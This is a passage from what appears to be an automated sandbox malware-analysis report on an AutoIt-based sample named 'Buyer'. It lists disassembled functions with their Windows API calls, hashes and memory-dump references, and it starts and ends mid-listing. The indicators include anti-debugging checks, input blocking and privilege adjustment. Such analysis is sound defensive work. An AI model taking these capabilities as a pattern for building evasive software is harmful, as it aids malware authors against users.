                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID: %.3d$X64
                                                                                                    • API String ID: 481472006-1077770165
                                                                                                    • Opcode ID: 1238c5e2cbfc141f4a30cc34b34c0ccd200ea049fb88390ab49be55cdaae849f
                                                                                                    • Instruction ID: 19af353f91098ebc7ea9111cf1208d974c8282cebc43f28f5441f1072708559d
                                                                                                    • Opcode Fuzzy Hash: 1238c5e2cbfc141f4a30cc34b34c0ccd200ea049fb88390ab49be55cdaae849f
                                                                                                    • Instruction Fuzzy Hash: C4D01266C0511DDADF50DAA09C49EB9777CBB08302F598452F946D1140F724964CBB21
                                                                                                    Function 00F728E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00F729DA
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00F729E4
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00F729F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: 080e5c719391c6b31298f17bad5e6bd103ab3a51f0cb4a6deb40d2e69a59db9b
                                                                                                    • Instruction ID: 8d0c801015e1cf758cc93d6edbdc779299b8e61e0f7e66b81edcfd82b3d8b177
                                                                                                    • Opcode Fuzzy Hash: 080e5c719391c6b31298f17bad5e6bd103ab3a51f0cb4a6deb40d2e69a59db9b
                                                                                                    • Instruction Fuzzy Hash: C331D475D0121D9BCB61DF68DD8879DBBB8AF08310F5042DAE40CA7261EB349F859F45
                                                                                                    Function 00F65038 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00F6500E,?,010098A8,0000000C,00F65165,?,00000002,00000000), ref: 00F65059
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00F6500E,?,010098A8,0000000C,00F65165,?,00000002,00000000), ref: 00F65060
                                                                                                    • ExitProcess.KERNEL32 ref: 00F65072
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 4f2ec5d487d36b21640786bc73700bf08aa32070294419e7ac6d95e7f0946078
                                                                                                    • Instruction ID: 35039d02df69ce712e7bba584fb211d435331567b081045a9b0fff3b26c00a0e
                                                                                                    • Opcode Fuzzy Hash: 4f2ec5d487d36b21640786bc73700bf08aa32070294419e7ac6d95e7f0946078
                                                                                                    • Instruction Fuzzy Hash: 5CE0EC3140154DBFCF216F64DD09A583B6AEF41B95F044015F9099A132DB3ADE42FB91
                                                                                                    Function 00FAE9FA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00FAEA2E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mouse_event
                                                                                                    • String ID: DOWN
                                                                                                    • API String ID: 2434400541-711622031
                                                                                                    • Opcode ID: 3f20cc073be02f124ba4a5fc97972f9a99287ddb2fb861cdd14f6f65929caac9
                                                                                                    • Instruction ID: 6e0289f207a8803bf082d56bf00527eb02dd09f5709f2be13af9fdccdce1b008
                                                                                                    • Opcode Fuzzy Hash: 3f20cc073be02f124ba4a5fc97972f9a99287ddb2fb861cdd14f6f65929caac9
                                                                                                    • Instruction Fuzzy Hash: 51E08CA69DDB223CB90531297C02FF6134CAF23635F11020AF800E80D0EE883C8271A8
                                                                                                    Function 00F9E514 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00F9E526
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID: X64
                                                                                                    • API String ID: 2645101109-893830106
                                                                                                    • Opcode ID: 8b5e19ef4e7417c784076cccf30c915cfd1281a815ec37d54827405b0df9ad72
                                                                                                    • Instruction ID: 01bd6b4e4e37c945c7840b4fb33b4b45ed1580925ebfd70f30691dcb4ff1b3dc
                                                                                                    • Opcode Fuzzy Hash: 8b5e19ef4e7417c784076cccf30c915cfd1281a815ec37d54827405b0df9ad72
                                                                                                    • Instruction Fuzzy Hash: B3D0E9B581612DEADF94CB60DC88ED9777CBB44305F144556F506E2140E7749649AB10
                                                                                                    Function 00FA17A1 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FA18DE), ref: 00FA17B6
                                                                                                    • CloseHandle.KERNEL32(?,?,00FA18DE), ref: 00FA17CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 81990902-0
                                                                                                    • Opcode ID: 945ee9c6646d007904ce896a0a4b05838bdc59bbe349043c79d2320c229ace37
                                                                                                    • Instruction ID: 407648881364abb043aa615e2fba2484b1cdc855e3ac3d1fc3e7d28085ed149d
                                                                                                    • Opcode Fuzzy Hash: 945ee9c6646d007904ce896a0a4b05838bdc59bbe349043c79d2320c229ace37
                                                                                                    • Instruction Fuzzy Hash: 86E0BF72015614AFF7652B20FC0AE7777E9FB05720F24881EF59581470DB626C90FB50
                                                                                                    Function 00FBF229 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • BlockInput.USER32(00000001), ref: 00FBF244
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockInput
                                                                                                    • String ID:
                                                                                                    • API String ID: 3456056419-0
                                                                                                    • Opcode ID: a7d7fef4f8c09d903ce85c71c64bf667e7f134e567509d344a60ee63908a0199
                                                                                                    • Instruction ID: d03d1bdc776d11f042037d5ba5134bf2d1f2b5e816e57ec32513e886072f707e
                                                                                                    • Opcode Fuzzy Hash: a7d7fef4f8c09d903ce85c71c64bf667e7f134e567509d344a60ee63908a0199
                                                                                                    • Instruction Fuzzy Hash: 21E04F362102049FC710AF6ADC44A9ABBECAF94764F00C026FD49C7351DAB4FC45AF91
                                                                                                    Function 00F60D25 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D31,00F6073E), ref: 00F60D2A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 5e52c000b06a8cc7161a58330b560813bbb3c64cb6a5b8d5d78fffc87a295485
                                                                                                    • Instruction ID: bbc75979f5bf55fe5a3a6d0b2b47fb84e11ca2ef2f824557dcf636342a1b4731
                                                                                                    • Opcode Fuzzy Hash: 5e52c000b06a8cc7161a58330b560813bbb3c64cb6a5b8d5d78fffc87a295485
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 00FC3265 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FC32B7
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FC32CA
                                                                                                    • DestroyWindow.USER32 ref: 00FC32D9
                                                                                                    • GetDesktopWindow.USER32 ref: 00FC32F4
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FC32FB
                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00FC342A
                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00FC3438
                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC347F
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00FC348B
                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FC34C7
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC34E9
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC34FC
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC3507
                                                                                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC3510
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC351F
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC3528
                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC352F
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00FC353A
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC354C
                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FE0C20,00000000), ref: 00FC3562
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00FC3572
                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00FC3598
                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00FC35B7
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC35D9
                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FC37C6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                    • Opcode ID: e8bc46b57140fa50be99b1ed9cff6d812ab5cc9af1c5b733176179f9bc762f1b
                                                                                                    • Instruction ID: d6bb9fdd6dc5a718e0934647a8eb02a63c4c6093c3896bc9cfe77fa987f4ae2a
                                                                                                    • Opcode Fuzzy Hash: e8bc46b57140fa50be99b1ed9cff6d812ab5cc9af1c5b733176179f9bc762f1b
                                                                                                    • Instruction Fuzzy Hash: BF026D71900209AFDB14DF64CD89EAE7BBAEF48310F148159F915AB291CB74ED01EF60
                                                                                                    Function 00FD77A0 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00FD77FA
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD782B
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FD7837
                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00FD7851
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FD7860
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00FD788B
                                                                                                    • GetSysColor.USER32(00000010), ref: 00FD7893
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00FD789A
                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00FD78A9
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FD78B0
                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00FD78FB
                                                                                                    • FillRect.USER32(?,?,?), ref: 00FD792D
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD794F
                                                                                                      • Part of subcall function 00FD7AB3: GetSysColor.USER32(00000012), ref: 00FD7AEC
                                                                                                      • Part of subcall function 00FD7AB3: SetTextColor.GDI32(?,?), ref: 00FD7AF0
                                                                                                      • Part of subcall function 00FD7AB3: GetSysColorBrush.USER32(0000000F), ref: 00FD7B06
                                                                                                      • Part of subcall function 00FD7AB3: GetSysColor.USER32(0000000F), ref: 00FD7B11
                                                                                                      • Part of subcall function 00FD7AB3: GetSysColor.USER32(00000011), ref: 00FD7B2E
                                                                                                      • Part of subcall function 00FD7AB3: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FD7B3C
                                                                                                      • Part of subcall function 00FD7AB3: SelectObject.GDI32(?,00000000), ref: 00FD7B4D
                                                                                                      • Part of subcall function 00FD7AB3: SetBkColor.GDI32(?,00000000), ref: 00FD7B56
                                                                                                      • Part of subcall function 00FD7AB3: SelectObject.GDI32(?,?), ref: 00FD7B63
                                                                                                      • Part of subcall function 00FD7AB3: InflateRect.USER32(?,000000FF,000000FF), ref: 00FD7B82
                                                                                                      • Part of subcall function 00FD7AB3: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FD7B99
                                                                                                      • Part of subcall function 00FD7AB3: GetWindowLongW.USER32(00000000,000000F0), ref: 00FD7BA6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                    • String ID:
                                                                                                    • API String ID: 4124339563-0
                                                                                                    • Opcode ID: 79f833edf5cc575d3ce4ce741f45c249d3a0ef3e0f262459a3798f5cd8b87c8a
                                                                                                    • Instruction ID: d571539164bd1b3b3e3a82de81447c261cf24680a8d0ffa2ac12c07c5cd369b1
                                                                                                    • Opcode Fuzzy Hash: 79f833edf5cc575d3ce4ce741f45c249d3a0ef3e0f262459a3798f5cd8b87c8a
                                                                                                    • Instruction Fuzzy Hash: CCA1A272409305AFD701AF74DC48B6BBBAAFF48324F140A1AF9629A1E0E735D944EB51
                                                                                                    Function 00F590AA Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?), ref: 00F59139
                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F9716B
                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F971A4
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F975E9
                                                                                                      • Part of subcall function 00F59287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F58F0D,?,00000000,?,?,?,?,00F58EDF,00000000,?), ref: 00F592EA
                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00F97625
                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F9763C
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F97652
                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F9765D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                    • Opcode ID: f07354c07f29f35962eb390cc1d99a107ce6a3d8112be5f5584d90ec59a49573
                                                                                                    • Instruction ID: b7d1f6668fa51d0cb64e5eaa2792070bc020901f0512ff0743cc16c409cc7d60
                                                                                                    • Opcode Fuzzy Hash: f07354c07f29f35962eb390cc1d99a107ce6a3d8112be5f5584d90ec59a49573
                                                                                                    • Instruction Fuzzy Hash: BD12E330A18752DFEB29EF28C848BA5B7B2FF44321F184469F9858B251C735E846EF51
                                                                                                    Function 00FC2E98 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000), ref: 00FC2EC5
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FC2FF1
                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00FC3030
                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00FC3040
                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00FC3087
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00FC3093
                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00FC30DC
                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FC30EB
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00FC30FB
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00FC30FF
                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00FC310F
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FC3118
                                                                                                    • DeleteDC.GDI32(00000000), ref: 00FC3121
                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FC314D
                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FC3164
                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00FC31A4
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FC31B8
                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FC31C9
                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00FC31FE
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00FC3209
                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FC3214
                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00FC321E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                    • API String ID: 2910397461-517079104
                                                                                                    • Opcode ID: e3d48bdfd25579c96941a24b2975ca9e7d2998331050441d91666127415a7836
                                                                                                    • Instruction ID: 9f14b17f2e94d62e397659c859f4e799f6b0af8e2920a08296aafb0cb3bc786a
                                                                                                    • Opcode Fuzzy Hash: e3d48bdfd25579c96941a24b2975ca9e7d2998331050441d91666127415a7836
                                                                                                    • Instruction Fuzzy Hash: 5FB14DB1A40219AFEB24DF68DD46FAE7BB9EB48710F108119F915E7290C778ED00DB90
                                                                                                    Function 00FB524E Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00FB525C
                                                                                                    • GetDriveTypeW.KERNEL32(?,00FDDB28,?,\\.\,00FDDC1C), ref: 00FB5339
